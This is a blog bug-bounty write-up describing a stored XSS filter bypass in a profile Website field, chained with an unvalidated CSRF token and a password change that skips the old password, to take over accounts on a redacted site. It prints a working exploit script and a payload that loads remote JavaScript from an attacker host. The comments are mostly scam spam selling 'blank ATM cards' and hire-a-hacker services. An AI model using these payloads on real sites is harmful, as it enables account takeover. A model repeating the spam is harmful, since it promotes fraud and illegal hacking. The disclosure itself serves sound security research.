XSS + CSRF = Bhoom!

Hello :D Everyone,

It had been a long time since I got a good bug and a bounty too :3 so after an OWASP meet where I met many leet bounty hunters I felt so much motivated, to do a bug hunt.I started poking around and all , so this is a story of a simple Full Account Takeover on a h1 private site

Reported To****************
TypesCross-Site Request Forgery (CSRF),Cross-Site Scripting (XSS)
1. Stored XSS(Required Interaction)
 I found a XSS on its main domain in Website field of user's Profile.I tried javascript:alert(1) to check if javascript could be executed but saw that it was detected as invalid so I tried to to modify the payload to use it like javascript://http://google.com/?aaaa%0aalert(1) and it worked!.For those who don't know.

javascript:                        - Javascript's pseduo protocol/schema
//                                       - Begins a single line comment in js
https://google.com/?aaaa - comment itself
%0a                                  - Intiate a new line which ends the single line comment
alert(1)                             - a valid javascript's predefined function

so It got updated on my profile. But it required Victim to click on Attacker's website by sending him the Attacker's profile page which was publicly accessible so thats how i got a simple XSS with easy bypass. Now I decided to go further before reporting and I played around a little more and I Found that in "Change Password" functionality , they don't ask for the user's old password.Well that was pretty awesome to exploit :D with the XSS we found.


2.CSRF Bypass
 Even though i had a XSS I decided to check if an anti-CSRF token was there(which was not a need since we can grab the token with XSS using xhr). I thought if we could check if CSRF token is being validated on the server side so all I did was , removed the authenticity_token parameter from the form :D and boom! it got updated without it.

#.Full Account TakeOver
so Combining XSS and no confirmation check on user's old password. I Created a POC Which takeover the victim's account by just a click on Attacker's profile's Website. All We need is the victim should be logged into his account.

Earlier while Changing the password I saw that the form was submitted to an endpoint which had a unique user id which was not publicly known
https://www.******.com/users/{UNIQUE ID}
so we just needed to grab userid and since the csrf token is not validated we don't need to grab that.

So I made XHR Request to  /account (various other end points also contained user_id in their source) to find the user_id(victim's) and grabbed that and submitted the Password Change form with that user_id







I hosted this javascript on a https domain.
var user_id;
var http=new XMLHttpRequest;
http.open("GET","https://www.*******.com/account",true);
http.send();
http.onload=function()
{
    if(http.status===200)
    {
        var html=http.responseText;
        var parser=new DOMParser;
        var dom=parser.parseFromString(html,'text/html');
      
           user_id=(dom.getElementsByClassName('edit_user')[0].id).split('_')[2];

      
    }
};
alert(user_id);
var f=document.createElement('form');
var i1=document.createElement('input');
var i2=document.createElement('input');
var i3=document.createElement('input');
var i4=document.createElement('input');
var i5=document.createElement('input');
f.action="https://www.********.com/users/"+user_id;
f.class="edit_user";
f.id="edit_user_"+user_id;
f.method="POST";
i1.name="utf8";
i1.type="hidden";
i1.value="✓";
i2.name="_method";
i2.type="hidden";
i2.value="put";
i3.id="page";
i3.name="page";
i3.type="hidden";
i3.value="password";
i4.id="user_password"
i4.name="user[password]"
i4.value="my1337pass";
i4.type="password";
i5.class="button";
i5.name="commit";
i5.type="submit";
f.appendChild(i1);
f.appendChild(i2);
f.appendChild(i3);
f.appendChild(i4);
f.appendChild(i5);
f.submit();

and entered
 javascript://http://google.com.?a%0avar x=document.createElement('script');x.src='https://myhost/script.js';document.body.appendChild(x);
in the website url and updated my(attacker's) profile.



Now all victim had to do was , to click on attacker's website and BOOM! his password got changed to 'my1337pass'.


I got a fair enough bounty :D.

Thanks to every awesome infosec people who share their knowledge.

14 comments:

  1. bug bounty gawd, h1 private site

    ReplyDelete
    Replies
    1. INSTEAD OF GETTING A LOAN, CHECK OUT THE BLANK ATM CARD IN LESS THAN 24hours {blankatmhaker@gmail.com}

      Am Mark Oscar,I want to testify about Jack Robert blank ATM cards which can withdraw money from any ATM machines around the world. I was very poor before and have no hope then I saw so many testimony about how Jack Robert send them the ATM blank card and use it to collect money in any ATM machine and become rich. I also email him and he sent me the blank card. I have use it to get 70,000 dollars. withdraw the maximum of $5,000 daily. Jack Robert is giving out the card just to help the poor. Hack and take money directly from any ATM Machine Vault with the use of ATM Programmed Card which runs in automatic mode. email Him on how to get it now via: blankatmhaker@gmail.com or call/Text on +1(406) 350-4986

      Delete
    2. This comment has been removed by the author.

      Delete
  2. Amazing poC dude! thanks for sharing!

    https://twitter.com/knowledge_2014

    best regards
    ak1t4

    ReplyDelete
  3. I am having confused javascript://http://google.com/?aaaa%0aalert(1)
    this payload still runs and worked for many doamin whats this

    ReplyDelete

  4. شركة تنظيف فلل بالمدينة المنورة المنورة 0542742095 -0509178637
    | المدينة المنورة
    شركة تنظيف فلل بالمدينة المنورة

    يمكن الآن القيام بعملية التنظيف للفلل بغاية في السهولة الفلل معروفة بمساحتها الكبيرة وطوابقها المتعددة ولا يمكن لأصحابها أن يقوموا بعملية التنظيف كتنظيف وغسيل السجاد الموجود بها وأيضا الموكيت الذي يغطي معظم أرضيات المكان وأيضا تنظيف موقف السيارات الموجود بها والحديقة ولكن من خلال شركة تنظيف فلل بالمدينة المنورة يتم توفير العديد من الخدمات ويمكن طلبها مرة واحدة أو كل خدمة على حدى ومن ضمن تلك الخدمات لو كنت تريد تنظيف الممشى الخارجي للفلل فيمكن الاتصال وطلب خدمة جلى الأرضيات وأيضا يوجد لدينا خدمة تنظيف واجهات الفلل بأحدث الطرق حيث يتم استخدام مواد تقوم بالحفاظ على ألوان البياض وحمايته من العوامل الجوية كالأمطار والأتربة من الرياح الموسمية وأيضا خدمة تنظيف كنب وموكيت وستائر
    http://www.elmadinaelmonawara.com/%D8%B4%D8%B1%D9%83%D8%A9-%D8%AA%D9%86%D8%B8%D9%8A%D9%81-%D9%81%D9%84%D9%84-%D8%A8%D8%A7%D9%84%D9%85%D8%AF%D9%8A%D9%86%D8%A9-%D8%A7%D9%84%D9%85%D9%86%D9%88%D8%B1%D8%A9/

    للتواصل معانا
    0542742095 -0509178637

    او زيارة موقعنا
    http://www.elmadinaelmonawara.com
    كما نقدم اليكم المزيد من الخدمات
    شركة تنظيف منازل بالمدينة المنورة

    شركة تنظيف شقق بالمدينة المنورة

    شركة تنظيف عمائر بالمدينة المنورة
    شركة تنظيف بالمدينة المنورة

    ReplyDelete
    Replies
    1. INSTEAD OF GETTING A LOAN, CHECK OUT THE BLANK ATM CARD IN LESS THAN 24hours {blankatmhaker@gmail.com}

      Am Mark Oscar,I want to testify about Jack Robert blank ATM cards which can withdraw money from any ATM machines around the world. I was very poor before and have no hope then I saw so many testimony about how Jack Robert send them the ATM blank card and use it to collect money in any ATM machine and become rich. I also email him and he sent me the blank card. I have use it to get 70,000 dollars. withdraw the maximum of $5,000 daily. Jack Robert is giving out the card just to help the poor. Hack and take money directly from any ATM Machine Vault with the use of ATM Programmed Card which runs in automatic mode. email Him on how to get it now via: blankatmhaker@gmail.com or call/Text on +1(406) 350-4986

      Delete
  5. Hack and take money directly from any ATM Machine Vault with the use of ATM Programmed Card which runs in automatic mode. email (hydracards63@gmail.com) for how to get it and it cost,and how to also hack credit cards and send the money to your self,we are located around the world, these cards works on any ATM machine and it works according to it's activation.

    ………. EXPLANATION OF HOW THESE CARD WORKS……….

    You just slot in these card into any ATM Machine and it will automatically bring up a MENU of 1st VAULT #1,000, 2nd VAULT #5,000, RE-PROGRAMMED, EXIT, CANCEL. Just click on either of the VAULTS, and it will take you to another SUB-MENU of ALL, OTHERS, EXIT, CANCEL. Just click on others and type in the amount you wish to withdraw from the ATM and you have it cashed instantly… Done.

    ***NOTE: DON’T EVER MAKE THE MISTAKE OF CLICKING THE “ALL” OPTION. BECAUSE IT WILL TAKE OUT ALL THE AMOUNT OF THE SELECTED VAULT. To get the card email (hydracards63@gmail.com)

    ReplyDelete
  6. I've been reluctant in purchasing this blank ATM card i heard about online because everything seems too good to be true, but i was convinced & shocked when my friend at my place of work got the card from martins hackers & we both confirmed it really works, without delay i gave it a go. Ever since then I've been withdrawing $5000 daily from the card & the money has been in my own account. So glad i gave it a try at last & this card has really changed my life financially without getting caught, its real & truly works though its illegal but made me rich!! If you need this card from martins hackers then here is their email: martinshackers22@gmail.com....

    ReplyDelete
  7. How I Got My Blank ATM Card And Became Weathy...

    I'am Janaz Russ, me and my husband are here to testify about how we use
    Shawn Pablo ATM black card to make money and also have our own business
    today. Go get your blank ATM card today and be among the lucky ones. This
    PROGRAMMED blank ATM card is capable of hacking into any ATM machine,
    anywhere in the world. It has really changed our life for good and now we
    can say we are rich and we can never be poor again. You can withdraw the
    maximum of $ 10,000 daily We can proudly say our business is doing fine and
    we have up to 20,000 000 (20 millions dollars in our account) Is not
    illegal, there is no risk of being caught because it has been programmed in
    such a way that it is not traceable, it also has a technique that makes it
    impossible for the CCTV to detect you.. For details and cost on how to get
    yours today, email the hackers on: rickatmcardoffer@gmail.com

    ReplyDelete
  8. I am Mathew Cox from USA, I want to share my testimony on how i got the blank ATM card. I was so wrecked that my company fired me simply because i did not obliged to their terms, so they hacked into my system and phone and makes it so difficult to get any other job, i did all i could but things kept getting worse by the day that i couldn’t afford my 3 kids fees and pay my bills. I owe so many people trying to borrow money to survive because my old company couldn’t allow me get another job and they did all they could to destroy my life just for declining to be among their evil deeds. haven’t given up i kept searching for job online when i came across the testimony of a lady called Judith regarding how she got the blank ATM card. Due to my present state, i had to get in touch with Hacker called OSCAR WHITE of oscarwhitehackersworld@gmail.com and he told me the procedures and along with the terms which i agreed to abide and i was told that the Blank card will be deliver to me without any further delay and i hold on to his words and to my greatest surprise, i received an ATM card worth $4.5 million USD , All Thanks to OSCAR WHITE , if you are facing any financial problem contact him asap email address is oscarwhitehackersworld@gmail.com or Whats-app him +16319929129

    ReplyDelete
  9. CLASSIC CYBER HACKS
    How well are you prepared for a Cyber incident or Breach?, Is your Data safe?

    Strengthen your Cybersecurity stance by contacting CLASSIC CYBER HACKS for a Perfect, Unique, Classic and Professional Job in Securing your Network against all sort of Breache, for we are Specially equipped with the Best hands to getting your Cyber Hack needs met

    We specialize in All type of cyber Jobs such as:

    #TRACKING of GPS location, cars, Computers, Phones (Apple, windows and Android), e.t.c.
    We also track E-mail account, Social media such as Facebook, Twitter, Skype, Whatsapp, e.t.c.

    #RECOVERY of Passwords for E-mail address, Phones, Computers, Social media Accounts, Documents e.t.c,.
    NOTE: we also help Scammed persons recover their money.

    #INSTALLATION of Spy ware so as to spy into someone else's computer, phone or E-mail address and also Installation of Spy ware software on your individual O.S to know if your Gadget is being hacked into..
    We also Create and Install VIRUS into any desired computer gadget.

    #CRACKING into Websites, CCTV Survelance camera, Data base etc, of both Private and Govt organization, such as Schools, Hospitals, Court houses, The FBI, NSA e.t.c

    NOTE: We specialize in clearing of CRIMINAL RECORDS of diverse types.

    * We assure you that your Job will be attended to with care and efficiency as it will be handled with the Best professional hands in Cyber Hack business.

    #We also have a forum where you can get yourself equipped with Advanced hacking Knowledge
    And Also, if you're Good with Hacking and you think you can Join our Team of SOPHISTICATED HACKERS, you're welcome as well...
    At CLASSIC CYBER HACKS, we give you the Best service in the Hacking world.

    Write us on:

    *Classiccyberhacks@gmail.com
    *Classiccybernotch@gmail.com

    Signed,
    Collins .A.

    ReplyDelete

Powered by Blogger.